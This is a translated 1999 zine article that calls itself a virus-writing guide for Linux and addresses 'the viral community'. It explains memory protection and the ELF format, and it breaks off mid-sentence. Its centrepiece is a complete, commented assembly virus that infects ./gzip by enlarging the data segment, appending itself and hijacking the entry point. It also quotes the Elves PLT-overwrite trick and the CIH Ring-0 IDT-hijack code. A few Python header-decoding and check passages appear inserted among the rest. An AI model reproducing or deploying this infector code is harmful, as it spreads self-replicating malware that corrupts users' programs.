┌─────────────────────────────┐
│ Xine - issue #5 - Phile 105 │
└─────────────────────────────┘

Viruses under LiNUX
============================================================================

Index
~~~~~
1. Introduction
   1.1 Foreword by Billy Belcebu
   1.2 Original Author Introduction
2. ELF Infection
3. Resident viruses
   3.1 Global residency in Ring-0
   3.2 Global residency in Ring-3
   3.3 PerProcess residency

NOTE: This article was written using kernel version 2.0.34, whose segment
layout is different from that of current kernel versions such as 2.2.XX.

Introduction
------------

1. Foreword by Billy Belcebu
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Hi, and welcome to the world's first ever Virus Writing Guide for the LiNUX
system. This tutorial is NOT written by me; my only intention is to translate
it for the viral community in general. If you want to take a look at the
original version (in Spanish), you can find it on my own website
(http://beautifulpeople.cjb.net). The author, who wants to remain anonymous,
has shown impressive LiNUX skills as well as a good assembler level (rare for
a LiNUX coder), but he has a problem with his lack of optimization ;)

My conclusions after reading this article are several: LiNUX kicks ass, LiNUX
kicks Windoze's ass... Just look at its heavy and very intelligent protection:
it's almost impossible to reach Ring-0 (at least without being root), it's
impossible to achieve Ring-3 global residency (thanks to the impressive
copy-on-write mechanism), and all those details make LiNUX the best choice
among today's operating systems. Really.

My English is not very good, but it seems I'm the only one willing to take the
trouble to translate this. Besides, I think that leaving this jewel only in
Spanish would be an unforgivable sin. So here I am, translating it 4 u ;)

Enjoy!

(c) 1999 Mr Anonymous       [ Original Article ]
(c) 1999 Billy Belcebu/iKX  [ Translation ]

PS: I have the author's permission for this.
Don't blame me with copyrightz...

2. Introduction: Memory protection
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The never-ending question: why are there no viruses for Linux? It seems that
the viral community, accustomed to Real Mode systems (DOS), finds it hard to
adapt to protected mode systems. Even for Win95/98, systems with serious
design problems, there are only about 30 viruses, the great majority of them
non-resident viruses or VxD infectors (Ring-0 devices). The answer seems to
lie in the strong memory protection implemented by Linux.

Systems like Win95/NT use a memory design that makes limited use of segments.
In these systems, both the user and the kernel selectors can address the whole
virtual space, i.e. from 0x00000000 to 0xFFFFFFFF. (That doesn't mean you can
write to all of that memory, because the memory pages also have their own
protection attributes.)

In Linux the design is very different. There are two zones clearly separated
by segmentation: one dedicated to user processes, from 0x00000000 to
0xC0000000, and another for the kernel, from 0xC0000000 to 0xFFFFFFFF.

Let's see a register dump in GDB, taken at the beginning of the execution of a
command like GZIP.

    (gdb)info registers
    eax            0x0          0
    ecx            0x1          1
    edx            0x0          0
    ebx            0x0          0
    ebp            0xbffffd8c   0xbffffd8c
    esi            0xbffffd9c   0xbffffd9c
    edi            0x4000623c   1073766972
    eip            0x8048b10    0x8048b10
    eflags         0x296        662
    cs             0x23         35
    ss             0x2b         43
    ds             0x2b         43
    es             0x2b         43
    fs             0x2b         43
    gs             0x2b         43

We can see that Linux uses the selector 0x23 for code and the selector 0x2B
for data. Intel uses 16-bit selectors. The two least significant bits store
the RPL, the privilege level requested through that selector. (Intel
implements 4 protection rings, but current operating systems like Win95/NT or
Linux use only 2: Ring-0 for the kernel, the maximum privilege level, and
Ring-3 for user processes.)
The next bit tells where the descriptor holding the information about the
segment is located: 0 for the GDT (GLOBAL DESCRIPTOR TABLE) or 1 for the LDT
(LOCAL DESCRIPTOR TABLE). The remaining bits are simply the index of a segment
descriptor inside the LDT or the GDT, according to that bit.

    Selector

    [ 13 bits, Index to descriptor ] [ 1 bit, GDT/LDT ] [ 2 bits, RPL ]

If we convert 0x23 to binary we get

    [ 0 0 0 0 0 0 0 0 0 0 1 0 0 ] [ 0 ] [ 1 1 ]

So we know that it is a Ring-3 selector (it is used by a process) and that
the information about the segment lies in the GDT, at entry 4 (counting from
0). If we analyze the other selector (0x2B) we obtain similar information,
but the descriptor is at entry 5.

If we take a look at the kernel's code, more concretely at the file
/usr/src/linux/arch/i386/kernel/head.S (painfully in assembler :)), we can
see the segment initialization in Linux.

/*
 * This gdt setup gives the kernel a 1GB address space at virtual
 * address 0xC0000000 - space enough for expansion, I hope.
 */
ENTRY(gdt)
        .quad 0x0000000000000000        /* NULL descriptor */
        .quad 0x0000000000000000        /* not used */
        .quad 0xc0c39a000000ffff        /* 0x10 kernel 1GB code at 0xC0000000 */
        .quad 0xc0c392000000ffff        /* 0x18 kernel 1GB data at 0xC0000000 */
        .quad 0x00cbfa000000ffff        /* 0x23 user   3GB code at 0x00000000 */
        .quad 0x00cbf2000000ffff        /* 0x2b user   3GB data at 0x00000000 */
        .quad 0x0000000000000000        /* not used */
        .quad 0x0000000000000000        /* not used */
        .fill 2*NR_TASKS,8,0            /* space for LDT's and TSS's etc */
#ifdef CONFIG_APM
        .quad 0x00c09a0000000000        /* APM CS    code */
        .quad 0x00809a0000000000        /* APM CS 16 code (16 bit) */
        .quad 0x00c0920000000000        /* APM DS    data */
#endif

As you can see, Linux initializes 4 segments: 2 for the kernel and 2 for the
user, one for code and one for data in each case.
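The selector layout and the GDT entries quoted above can be checked by hand,
or with a few lines of Python. This is only a sketch: the function names
`decode_selector` and `decode_descriptor` are made up for illustration, and
the bit positions are the standard i386 ones (limit in bits 0-15 and 48-51,
base in bits 16-39 and 56-63, access byte in bits 40-47, granularity in
bit 55).

```python
def decode_selector(sel):
    """Split a 16-bit segment selector into index, table and RPL."""
    return {
        "index": sel >> 3,                      # 13-bit descriptor index
        "table": "LDT" if sel & 0x4 else "GDT", # table indicator bit
        "rpl": sel & 0x3,                       # requested privilege level
    }


def decode_descriptor(desc):
    """Decode the fields of a 64-bit i386 segment descriptor."""
    limit = (desc & 0xFFFF) | (((desc >> 48) & 0xF) << 16)
    base = ((desc >> 16) & 0xFFFFFF) | (((desc >> 56) & 0xFF) << 24)
    access = (desc >> 40) & 0xFF
    granular = bool((desc >> 55) & 1)           # G=1: limit counts 4 KB pages
    return {
        "base": base,
        "size": (limit + 1) * (4096 if granular else 1),
        "dpl": (access >> 5) & 0x3,             # ring needed to use the segment
        "code": bool(access & 0x08),            # executable bit of the type field
        "present": bool(access & 0x80),
    }


if __name__ == "__main__":
    for sel in (0x10, 0x18, 0x23, 0x2B):
        print(hex(sel), decode_selector(sel))
    for desc in (0xC0C39A000000FFFF, 0xC0C392000000FFFF,
                 0x00CBFA000000FFFF, 0x00CBF2000000FFFF):
        info = decode_descriptor(desc)
        print(f"{desc:#018x} base={info['base']:#010x} size={info['size']:#x} "
              f"dpl={info['dpl']} code={info['code']}")
```

Feeding it the four descriptors from head.S reproduces the comments in that
file: 1 GB at 0xC0000000 with DPL 0 for the kernel, 3 GB at 0x00000000 with
DPL 3 for the user.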
Each entry stores information such as the base address of the segment and its
limit, whether it is present in memory, the kind of segment, and whether its
code is 16 or 32 bits.

As long as DS holds a user selector, we can never touch an address above
0xC0000000, because we would be outside the memory reachable through the
segment: we would receive a SIGSEGV signal and our process would be finished
painfully.

I know I can address from 0x00000000 to 0xC0000000 but, what can I modify?
Here begins the real protection mechanism. Memory is divided into pages of
4 KB each on Intel, and each page has its own attributes: whether it is
read/write, whether it is in memory (it can be temporarily on disk), whether
it belongs to the kernel, etc. All the information about the pages in memory
is kept in a page table that contains a descriptor for each mapped page.
There is one page table per process, which gives each process its own virtual
space and, besides, prevents any process from accessing the memory of another
one. This makes it possible to load programs at the same memory address, and
that is really what happens: Windows 95/98 and Linux both do it. In Linux the
usual load address is 0x08048000, while in Windows it is 0x00400000.

This page table is pointed to by a control register of the processor (CR3),
so it changes with each context switch, changing the virtual space of the
process as well.

But then, if a process can only address its perprocess memory, how is it able
to execute system calls that reside above 0xC0000000? Intel gives us
mechanisms to jump to Ring-0 in a safe way when we need to make system calls.
Intel offers two methods: the TRAP GATES and the CALL GATES. Trap gates are
the usual choice (WinNT/98/95, Linux), although I believe some other Unix
systems use call gates for the ring jump.
The Trap Gates occupy one entry in the IDT (INTERRUPT DESCRIPTOR TABLE), and
allow the jump to Ring-0 through the generation of an interrupt. For that,
the jump address defined in the IDT must have a Ring-0 selector and the DPL
(Descriptor Privilege Level) of the gate must be 3, so that a user is allowed
to execute it.

In Linux the interrupt used for the jump is 0x80, while Win95 uses int 0x30,
for example. Let's see the disassembly of the getpid function of the LIBC
library. For that we create a C file like this:

    #include <unistd.h>

    void main()
    {
        getpid();   /* I get the PID of the process */
    }

After compiling it, we debug the binary file with GDB:

    (gdb)disass 0x8048480
    0x8048480:   pushl  %ebp
    0x8048481:   movl   %esp,%ebp
    0x8048483:   call   0x8048378
    0x8048488:   movl   %ebp,%esp
    0x804848a:   popl   %ebp
    0x804848b:   ret

As you can see, the call to getpid is implemented in Linux (and in other
systems) as a CALL to a special section inside the binary file (0x8048378).
There we find a jump to the desired library function. These jumps are set up
in memory by the OS to resolve the dynamic links with the libraries. In this
way any file can execute functions exported by others, provided the
information in the ELF header says so. Let's continue debugging:

    (gdb)disass getpid
    0x40073000 <__getpid>:     pushl  %ebp
    0x40073001 <__getpid+1>:   movl   %esp,%ebp
    0x40073003 <__getpid+3>:   pushl  %ebx
    0x40073004 <__getpid+4>:   movl   $0x14,%eax
    0x40073009 <__getpid+9>:   int    $0x80

These are the first instructions of the getpid library call. Its work is
simple: it only prepares a jump to Ring-0. If the function had parameters, it
would load the registers with them before the jump. Then it puts the function
number in EAX and calls int 0x80.

As you can see, the code of the libraries lives in the PerProcess memory,
below 0xC0000000, so it is Ring-3 code and it lacks the privileges to access
ports, privileged memory areas, etc. That is why the libraries are really
intermediaries between the calls made by the processes and the calls
generated via int 0x80.

All the system calls that need to jump to Ring-0 use int 0x80, and since
int 0x80 has a single descriptor, we always jump to the same memory address.
That is why we need to put the number of the function we want to call in the
EAX register. In Ring-0, the kernel evaluates the value of EAX to know which
function it has to serve and, according to that value, jumps to one function
or another using an internal table of function pointers called
sys_call_table.
The list of functions accessed through int 0x80 is in the file
/usr/include/sys/syscall.h

When an int 0x80 is executed, the processor changes the active code selector.
It changes from the selector 0x23 to 0x10, so we go from addressing
0x00000000-0xC0000000 to addressing 0xC0000000-0xFFFFFFFF.

The other jump method, rarely used, is based on an entry in the GDT or,
exceptionally, in the LDT. There we define what is called a CALL GATE, which
allows jumps to more privileged rings via the CALL FAR or JMP FAR assembler
instructions.

ELF infection
-------------

In Linux there are two executable formats, a.out and ELF; however, nowadays
every Linux executable and library uses the second one. The ELF format is
very powerful, and contains information to handle applications under
different processors. It records the processor the executable was compiled
for, and whether it uses little endian or big endian byte order.

Since it is a format designed for protected-mode processors, besides the
information about the physical sections present in the file, it carries
information about how the OS has to map the file in memory.

The ELF file starts with a header. The part that matters here is its first
0x24 bytes, which contain, among other things, the 'ELF' mark that identifies
the file as an ELF executable, the kind of processor, the entry point (the
virtual address of the first instruction that will be executed) and, after
that, 2 pointers to 2 tables.

The first table is the Program Header (physically located right after the ELF
header), which contains entries describing how the file will be mapped in
memory. Each entry holds the size of a segment in memory and in the file, as
well as the start address of the segment.

The second table is the Section Header, and it sits at the very end of the
file.
It contains information about each logical section, including protection
attributes, but this information is not used to map the code of the file in
memory.

With the GDB command 'maintenance info sections' we can see the section
structure with the protection attributes of each section. If you take a look
at it, you'll notice that all the read-only sections come first, and the
read/write sections are grouped together at the end.

This is necessary because the sections are mapped together in memory, in
consecutive pages, by means of a single entry in the program header. Sections
that share the same protection attributes can therefore share memory pages,
while sections with different attributes cannot. This avoids internal
fragmentation in the executables: if every section had to be mapped
separately, the last page of each section would be partly empty and a lot of
space would be wasted. Note also that the last read-only section does not
share a page with the first read/write one.

The output of this command for gzip is the following:

    (gdb)maintenance info sections
    Exec file: '/bin/gzip', file type elf32-i386.
    0x080480d4->0x080480e7 at 0x000000d4: .interp  ALLOC LOAD READONLY DATA HAS_CONTENTS
    0x080480e8->0x08048308 at 0x000000e8: .hash    ALLOC LOAD READONLY DATA HAS_CONTENTS
    0x08048308->0x08048738 at 0x00000308: .dynsym  ALLOC LOAD READONLY DATA HAS_CONTENTS
    0x08048738->0x08048956 at 0x00000738: .dynstr  ALLOC LOAD READONLY DATA HAS_CONTENTS
    0x08048998->0x08048b08 at 0x00000958: .rel.bss ALLOC LOAD READONLY DATA HAS_CONTENTS
    0x08048b10->0x08048b18 at 0x00000b10: .init    ALLOC LOAD READONLY CODE HAS_CONTENTS
    0x08048b18->0x08048e08 at 0x00000b18: .plt     ALLOC LOAD READONLY CODE HAS_CONTENTS
    0x08048e10->0x08050dac at 0x00000e10: .text    ALLOC LOAD READONLY CODE HAS_CONTENTS
    0x08050db0->0x08050db8 at 0x00008db0: .fini    ALLOC LOAD READONLY CODE HAS_CONTENTS
    0x08050db8->0x08051f25 at 0x00008db8: .rodata  ALLOC LOAD READONLY DATA HAS_CONTENTS
    0x08052f28->0x08053960 at 0x00009f28: .data    ALLOC LOAD DATA HAS_CONTENTS
    0x08053960->0x08053968 at 0x0000a960: .ctors   ALLOC LOAD DATA HAS_CONTENTS
    0x08053968->0x08053968 at 0x0000a968: .dtors   ALLOC LOAD DATA HAS_CONTENTS
    0x08053970->0x08053a34 at 0x0000a970: .got     ALLOC LOAD DATA HAS_CONTENTS
    0x08053a34->0x08053abc at 0x0000aa34: .dynamic ALLOC LOAD DATA HAS_CONTENTS
    0x08053abc->0x080a4078 at 0x0000aabc: .bss     ALLOC
    0x00000000->0x00000178 at 0x0000aabc: .comment READONLY HAS_CONTENTS
    0x00000178->0x000002b8 at 0x0000ac34: .note    READONLY HAS_CONTENTS

Take a look at that curious jump between the .rodata and .data sections,
caused by everything I explained before. This command lets you visualize how
the program will be laid out in memory, but this information is not what
drives the load. We won't even need to modify the section header to insert
more executable code in the file.

The Program Header is what really drives the load process. It contains 5
entries here, but it is possible to insert more.

- The first one loads the program header.
- The second one is a reference to an string with the routine and the name of the interpreter that will be the library that will create in memory the image of the process (usually ld-linux-so.1). - The third one loads every readonly sections, all those found in the first entries of the Section Header. - The fourth loads all the read/write sections - The fifth loads the .dynamic section needed for the dynamic link process. So one solution for insert more executable code could be the expanding of the data segment. This is problematic, because if we copy all the viric code to the end of the executable, i.e. just after the section header, and we expand the entry of the Program Header that corresponds with the data segment, the viral code would overwrite one logical section of the archive, the .bss section. As we had seen with the gdb dump, the .bss section is the last one that is part of the space of the process, and contains the ALLOC attribute, however it doesn't contains the LOAD attribute, so it doesn't load data from the file. This is caused by the fact that the .bss section contains uninitialized data (still) by the host code. If the viric code is mapped over that section is not very problematic, because the virus will be executed before the infected host, so after the virus execution, the host wouldn't care about it. This section, at load time, if filled of zeroes, so a bad programming, like suppose an uninitialized variable set to 0, would show the presence of the virus. In any case,the virus can avoid this copying itself to any other memory address, and filling its old position in .bss with zeroes. Another possibility could be to create another entry in the program header, but we would have to shift almost all the archive, and this would take too much infection time. 
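For reference, the header fields described in this section (the 'ELF' mark,
the entry point, the pointers to both tables and the Program Header entries)
can be listed read-only with a short Python script. This is a sketch that
assumes a 32-bit little-endian file; the names `read_elf32` and
`entry_segment` are hypothetical helpers, not part of any tool. The last
function shows one simple integrity check: in an ordinary executable the
entry point falls inside the read-only, executable segment, so an entry point
inside a writable segment deserves a closer look.

```python
import struct
import sys

ELF32_HEADER = struct.Struct("<16sHHIIIIIHHHHHH")   # 52-byte ELF32 header
ELF32_PHDR = struct.Struct("<IIIIIIII")             # 32-byte Program Header entry
PHDR_FIELDS = ("p_type", "p_offset", "p_vaddr", "p_paddr",
               "p_filesz", "p_memsz", "p_flags", "p_align")
PF_X, PF_W, PF_R = 1, 2, 4                          # segment permission flags


def read_elf32(data):
    """Return the entry point, table offsets and Program Header entries."""
    if len(data) < ELF32_HEADER.size or data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    if data[4] != 1 or data[5] != 1:
        raise ValueError("only 32-bit little-endian ELF is handled here")
    (_ident, _type, _machine, _version, e_entry, e_phoff, e_shoff, _flags,
     _ehsize, e_phentsize, e_phnum, _shentsize, _shnum,
     _shstrndx) = ELF32_HEADER.unpack_from(data)
    segments = []
    for i in range(e_phnum):
        fields = ELF32_PHDR.unpack_from(data, e_phoff + i * e_phentsize)
        segments.append(dict(zip(PHDR_FIELDS, fields)))
    return {"entry": e_entry, "phoff": e_phoff, "shoff": e_shoff,
            "segments": segments}


def entry_segment(info):
    """Return the segment whose memory range contains the entry point."""
    for seg in info["segments"]:
        if seg["p_vaddr"] <= info["entry"] < seg["p_vaddr"] + seg["p_memsz"]:
            return seg
    return None


if __name__ == "__main__" and len(sys.argv) > 1:
    with open(sys.argv[1], "rb") as handle:
        elf = read_elf32(handle.read())
    print(f"entry={elf['entry']:#x} phoff={elf['phoff']:#x} shoff={elf['shoff']:#x}")
    for seg in elf["segments"]:
        print({name: hex(value) for name, value in seg.items()})
    seg = entry_segment(elf)
    if seg is not None and seg["p_flags"] & PF_W:
        print("note: the entry point lies inside a writable segment")
```

Run it with the path of an executable as its only argument; nothing is
written to the file.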
;**************************************************************************** ; Linux ELF file infection ;**************************************************************************** ; Compile with: ; nasm -f elf hole.asm -o hole.o ; gcc hole.o -o hole [section .text] [global main] hoste: ret main: pusha ; Beginning of the virus ; Push all the parameters call getdelta getdelta: pop ebp sub ebp,getdelta mov eax,125 ; I modify the attributes with lea ebx,[ebp+main] ; mprotect for write in protec- ; ted pages and ebx,0xFFFFF000 ; Round up to pages mov ecx,03000h ; r|w|x attributes mov edx,07h ; We will only need this in int 80h ; the 1st gen, because we'll ; copy us in the data section mov ebx,01h lea ecx,[ebp+texto] mov edx,0Ch ; Show a Hello World with a call sys_write ; write to stdout mov eax,05 lea ebx,[ebp+archivo] ; open file to infect (./gzip) mov ecx,02 ; read/write int 80h mov ebx,eax ; Handle in EBX xor ecx,ecx xor edx,edx ; Go to beginning of file call sys_lseek lea ecx,[ebp+Elf_header] ; Read the ELF header to our mov edx,24h ; variable call sys_read cmp word [ebp+Elf_header+8],0xDEAD ; Check for previous infection jne infectar jmp salir infectar: mov word [ebp+Elf_header+8],0xDEAD ; The mark is on the 2 first ; fill bytes in the ident struc mov ecx,[ebp+e_phoff] ; e_phoff is a ptr to the PH add ecx,8*4*3 ; Obtain 3rd entry of data seg push ecx xor edx,edx call sys_lseek ; Go to that position lea ecx,[ebp+Program_header] ; Read the entry mov edx,8*4 call sys_read add dword [ebp+p_filez],0x2000 ; increase segment size in add dword [ebp+p_memez],0x2000 ; memory and in the file ; The size to add must be superior to the size of the virus, because besides ; copy the virus, we have also to copy the section table, located before ; and it is not mapped into mem by default. It could be shifted (for avoid ; copying it) but for simplycity reasons i don't do that. 
pop ecx xor edx,edx call sys_lseek ; back to entry position lea ecx,[ebp+Program_header] mov edx,8*4 call sys_write ; Write entry to the file xor ecx,ecx mov edx,02h call sys_lseek ; Go to file end ; EAX = File Size, that will be phisical offset of the virus mov ecx,dword [ebp+oldentry] mov dword [ebp+temp],ecx mov ecx,dword [ebp+e_entry] mov dword [ebp+oldentry],ecx sub eax,dword [ebp+p_offset] add dword [ebp+p_vaddr],eax mov eax,dword [ebp+p_vaddr] ; EAX = New entrypoint mov dword [ebp+e_entry],eax ; These are the calculations of the new entry address, that will point to the ; code of the virus. For calculate the virtual address of the virus in memory ; i move the pointer to the end of the file with lseek, so the EAX register ; will have the phisical size of the file (i.e. the physical position of the ; virus in the file). ; If to that position i substract the physical position of the beginning of ; the data segment, i will have the virus position relative to the beginning ; of the data segment, and if i add to it the virtual address of the segment ; i will obtain the virtual address of the virus in memory. 
lea ecx,[ebp+main] mov edx,virend-main call sys_write ; Write the virus to the end xor ecx,ecx xor edx,edx call sys_lseek ; Set pointer to beginning of ; the file lea ecx,[ebp+Elf_header] mov edx,24h call sys_write ; Modify header with new EIP mov ecx,dword [ebp+temp] mov dword [ebp+oldentry],ecx salir: mov eax,06 ; Close the file int 80h popa db 068h ; Opcode of a PUSH oldentry: dd hoste ; back to infected program ret sys_read: ; EBX = Must be File Handle mov eax,3 int 80h ret sys_write: ; EBX = Must be File Handle mov eax,4 int 80h ret sys_lseek: ; EBX = Must be File Handle mov eax,19 int 80h ret dir dd main dw 010h archivo db "./gzip",0 ; File to infect datos db 00h temp dd 00h ; Save oldentry temporally ;**************** Data Zone ************************************************* newentry dd 00h ; New virii EIP newfentry dd 00h myvaddr dd 00h texto db 'HELLO WORLD',0h Elf_header: e_ident: db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h e_type: db 00h,00h e_machine: db 00h,00h e_version: db 00h,00h,00h,00h e_entry: db 00h,00h,00h,00h e_phoff: db 00h,00h,00h,00h e_shoff: db 00h,00h,00h,00h e_flags: db 00h,00h,00h,00h e_ehsize: db 00h,00h e_phentsize: db 00h,00h e_phnum: db 00h,00h e_shentsize: db 00h,00h e_shnum: db 00h,00h e_shstrndx: db 00h,00h jur: db 00h,00h,00h,00h Program_header: p_type db 00h,00h,00h,00h p_offset db 00h,00h,00h,00h p_vaddr db 00h,00h,00h,00h p_paddr db 00h,00h,00h,00h p_filez db 00h,00h,00h,00h p_memez db 00h,00h,00h,00h p_flags db 00h,00h,00h,00h p_align db 00h,00h,00h,00h Section_entry: sh_name db 00h,00h,00h,00h sh_type db 01h,00h,00h,00h sh_flags db 03h,00h,00h,00h ;alloc sh_addr db 00h,00h,00h,00h sh_offset db 00h,00h,00h,00h sh_size dd (virend-main)*2 sh_link db 00h,00h,00h,00h sh_info db 00h,00h,00h,00h sh_addralign db 01h,00h,00h,00h sh_entsize db 00h,00h,00h,00h virend: ;**************************************************************************** If we execute this in a directory where is the gzip file, we will 
obtain the following message in the screen: HELLO WORLD If we execut the gzip, we will obtain this: HELLO WORLDgzip: compressed data not written to a terminal. Use -f to force compression. For help, type:gzip -h As you can see,the viral code is executed before the host, and after that it returns to it the control without any kind of dificulty. However there are other methods that allow the infection without expanding any section of the Program Header. The Staog virus and the Elves virus use alternative methods. Staog, for example, overwrites the entrypoint of the host with the code of the virus, and the overwritten code is copied to the end of the host. The virus, when receives the control at the execution moment, opens the file (for know the name it takes a look in the stack),takes the code of the virus and make a temporal file in the /tmp directory. After doing that, it calls to fork and while an execution thread is executing the viral code of the temporal archive by meand of execve, other execution thread copies that code to the stack of the program and give the control to that code, that will rebuild the code of the host, and return the control to the original entry- point. Elves, however, made by Super of the group 29A, uses a method much more advanced that makes perprocess residency, and avoids that the infected files grow up in size (cavity infection). NOTE: For more information about perprocess residecy and the structure and use of the PLT, take a look to the article of perprocess residency. The method consists in introduce the viral code in the PLT. The PLT is a necessary structure of the executable that allows the dynamic link of the functions. For that it doesn't move the PLT to other part of the executable or anything similar, the viral code overwrites it, but it continues working perfectly. 
As i will explain in the article about PerProcess residency, there're 2 ways to make a call to a library: by means of the dynamic linker (when we don't know what's the address of the function), or directly with a specific entry for that function in the PLT (when we've already obtained in the GOT the address). After Elves infection, the second method is disabled, and all the calls are made by means of the dynamic linker. The virus overwrites from the second entry, leaving untouched the first one (the one that makes the jump to the dynamic linker). As we can see in the article about PerProcess residency, an entry in the PLT has the following form: jmp *address_of_GOT pushl entry_in_reloc ; Necessary for the D.L. for jmp first_PLT_entry ; know what function needs As you can see, it's not a very optimized code, the first jump would occupy 5 bytes, the push other 5 bytes, and the next jump another 5 bytes, so the entry would have 15 bytes. So the virus is divided in blocks of 15 bytes, and this allows a sequential execution of the code in a normal way, but in the case that we try to make a jump to the beginning of a PLT entry, it would found a jmp previous_PLT_entry codified only with 2 bytes, with the opcodex 0xEB, 0xEE. Let's see an example: virus_start: fake_plt_entry1: pushl %eax pushal call get_delta get_delta: popl %edi enter $Stat_size,$0x0 movl (Pushl+Pushal+Pushl)(%ebp),%eax .byte 0x83 fake_plt_entry2: .byte 0xeb,0xee leal -0x7(%edi),%esi addl -0x4(%eax),%eax subl %esi,%eax shrl %eax movl %eax,(Pushl+Pushal)(%ebp) .byte 0x83 ; If we execute sequentially this code, we will fake_plt_entry3: ; execute the opcodes 0x83,0xEB,0xDE as if it was .byte 0xeb,0xde ; an only one opcode, so we would execute the ; opcode sub ebx,-22 ; But if we make a system call, this jumps to the ; 3rd entry of the PLT. 
The processor would find ; the opcodes 0xEB,0xDE, that is the opcode of a ; jmp fake_plt_entry2 By means of that, when a jump to any PLT entry is done, the execution thread would find miraculously 0xEB opcodes, that will go making little jumps until the virus_start label. From here, the virus will be execute sequentially garbage opcodes like sub ebx,-22 that really are hiding a jmp PLT_entry, and after trying to infect the first call to each system call, it makes a jump to the first PLT entry, so it jumps to the dynamic linker. I received the source code of this virus for test it, and painfully, in my Linux version it is not functional (Debian 2.0.34). This is because Super, with his needs of optimizing in space the virus, makes the following code for push the reloc entry and avoid to put a push each entry (that would have make him to break the virus in fragments even smaller): ; This is a generic code for push the entry in the reloc section movl (Pushl+Pushal+Pushl)(%ebp),%eax ; in EAX the return value of CALL imm leal -0x7(%edi),%esi ; in ESI the offset to the beginning of PLT addl -0x4(%eax),%eax ; in EAX the value of the immediate subl %esi,%eax ; Substract the two values shrl %eax ; in EAX i will have the reloc entry movl %eax,(Pushl+Pushal)(%ebp) ; Push the new value The dynamic linker need entries in the .reloc.plt section for know what address it needs to resolve. For that, it supposes that the consecutive entries of the PLT will have consecutive entries in the .reloc.plt section, and if fact, that's true. If we take a look to any PLT, the compiler puts in the first PLT a PUSH 0x00, in the second PLT a PUSH 0x08, in the third a PUSH 0x10, and so on. This is not really a problem, the real problem is to suppose that all the calls to the PLT are done with a CALL immediate (being the immediate a 4 bytes value). When we do a CALL in assembler,the processor pushes the return address on the stack (i.e. the address of the next ins- truction of the call). 
The virus, as we can see, reads from the stack that value, substracts to it a 4 (the size of the immediate) and reads the value pointed by that address (the next code after the call). To that value, it substracts the PLT address, so we obtain the difference of bytes of the PLT entry we've called to, and the beginning of the PLT, and with that value, it obtains the entry value in the reloc section with a simple rotation opcode. This method is okay if we only make calls with the opcode CALL immediate. This might be true, for example in the newest Linux versions,but for example my Linux version makes jumps to the PLT of the host only with the opcode CALL *EBP, also this instruction is not codifies in host's code, it's done by the dynamic linker even before the host takes the control (i still don't know why). Anyway this method is very interesting and useful. Resident Viruses ---------------- 1. Global residency in Ring-0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The resident viruses in Ring-0 are those that achieve maximum privileges in the processor, and already in Ring-0 they hook the system calls made by all the processes of the system. For achieve Ring-0 an user process should try to make various things: it could try to modify the IDT for generate a TRAP GATE, modify the GDT or the LDT for generate a CALL GATE, or even patch code in Ring-0, so as our code would receive the execution thread already in Ring-0. Wihtout any doubt, it seems a hard work, because all those structures are or should be protected by the OS. But in systems like Windows 95, where code like this (used by the CIH virus) allows us to jump to Ring-0 without difficulty: ;**************************************************************************** .586p .model flat,STDCALL extrn ExitProcess:PROC .data idtaddr dd ?,? 
.code ;************* Start of code for achieve Ring-0 ************* startvirii: sidt qword ptr [idtaddr] ; Obtain limit and address of the IDT mov ebx,dword ptr [idtaddr+2h] ; in EBX the base add ebx,8d*5d ; Modify int 5 cause i'm gonna use its ; IDT entry lea edx,[ring0code] ; in EDX goes the ring0code offset push word ptr [ebx] ; Modify IDT entry offset for make mov word ptr [ebx],dx ; the jump to ring0code when the int shr edx,16d ; 5h is executed push word ptr [ebx+6] mov word ptr [ebx+6],dx int 5h ; Generate the exception mov ebx,dword ptr [idtaddr+2h] ; Resotre entry offset of the IDT add ebx,8d*5h pop word ptr [ebx+6] pop word ptr [ebx] push -1 call ExitProcess ring0code: pushad ; Code executed under Ring-0 popad exit_r0: iretd endvirii: end: end startvirii ;**************************************************************************** What makes possible that this code works in Windows? The answer is simple, firstly Windows can directionate with user selectors the kernel memory, also (and besidess it seems incredible) lacks of protection by pagination in addresses superior to 0xC0000000, that lies, as linux, the code executed in Ring-0. So if we can directionate the IDT memory, and also we can write there, the jump to Ring-0 is easy. In this example we have chosen the int 0x05 because it is already a TRAP GATE in Windows,that's why we only modify the IDT entry and instead jump to the memory address assigned by windows, it would jump to our label ring0code inside the perprocess memory of our process. However,in Linux we can't directionate the user memory with Ring-0 selectors so we couldn't do the jump in case that we could directionate the kernel memory and the pagination protection would be deactivated, the modification of the IDT wouldn't be enough. If we modify the int 0x5 entry of the IDT for generate a TRAP GATE, we wouldn't be able to use the Ring-0 selector of Linux (0x10). 
In the IDT we would find the address 0x10:ring0code for the jump, but that
address does not point into the PerProcess memory: the base address of the
0x10 segment is 0xC0000000, so we would really be jumping to the address
0xC0000000+ring0code.

Let's see where the IDT lies in Linux. Compile the following code with NASM:

    [extern puts]
    [global main]
    [SECTION .text]
    main:
            sidt [data_]            ; Put in data_ the IDT limit and address
            nop
            sgdt [data_]            ; Put in data_ the GDT limit and address
            nop
            sldt [data_]            ; Put in data_ the LDT selector
            nop
            ret
    [SECTION .data]
    data_   dd 0x0,0x0

Executing this step by step and reading the value stored in 'data_', we get
the following memory dumps (0x80495ED = address of the 'data_' variable):

    Dump after SIDT
    (gdb)x/2 0x80495ED
    0x80495ed : 0x501007FF 0x0807C180

    Dump after SGDT
    (gdb)x/2 0x80495ED
    0x80495ed : 0x6880203F 0x0807C010

    Dump after SLDT
    (gdb)x/2 0x80495ED
    0x80495ed : 0x688002Af 0x0807C010

The first and the second instructions return, in the first 16 bits of
'data_', the IDT and the GDT limits respectively, and in the next 32 bits the
linear address of those structures. SLDT, on the other hand, only returns a
selector that points to the LDT descriptor inside the GDT (each LDT must have
a descriptor defined in the GDT).

So we know that the IDT has base address 0xC1805010 and a limit of 0x7FF
bytes. The GDT has base address 0xC0106880 and a limit of 0x203F bytes. And
of the LDT we know that its selector is 0x2AF.

As expected, the addresses are all above 0xC0000000, so they are well
protected from user processes.

Another way to access kernel memory could be to map kernel pages below
0xC0000000 but, painfully, that is not possible, because the page table
itself is mapped above 0xC0000000, so it can't be modified by Ring-3
processes.

Linux maps all the physical memory of your machine starting at the linear
address 0xC0000000 or, in other words, at the virtual address 0x0 when using
the kernel segment 0x10.
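The SIDT and SGDT dumps shown above can be decoded mechanically: each
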